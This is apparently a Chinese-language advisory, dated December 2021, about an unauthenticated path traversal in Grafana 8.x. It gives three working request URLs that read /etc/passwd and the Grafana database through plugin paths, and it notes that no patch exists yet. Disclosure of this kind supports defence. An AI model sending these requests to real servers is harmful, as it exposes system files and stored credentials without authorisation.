【漏洞预警】Grafana未授权任意文件读取漏洞
前言:
Grafana是一个跨平台的开源的度量分析和可视化工具,可以通过将采集的数据查询然后可视化的展示,并及时通知。用Go语言开发的开源数据可视化工具,可以做数据监控和数据统计,带有告警功能。目前使用grafana的公司有很多,如paypal、ebay、intel等。
漏洞简述:
未授权的攻击者利用该漏洞,能够获取服务器敏感文件。
安装:
Github:
https://github.com/grafana/grafana
Docker安装:
https://www.voidking.com/dev-docker-grafana/
影响版本:
Grafana 8.x
刮刮乐:
http://x.x.x.x/public/plugins/graph/../../../../../../../etc/passwd
http://x.x.x.x/public/plugins/graph/../../../../../../../var/lib/grafana/grafana.db
http://x.x.x.x/public/plugins/grafana-clock-panel/../../../../../../../etc/passwd
默认安装组件:
修补建议:
目前暂无相关补丁,及时关注官方动态,获取最新版本。
本文参与?腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-12-07 22:18:25,如有侵权请联系?cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读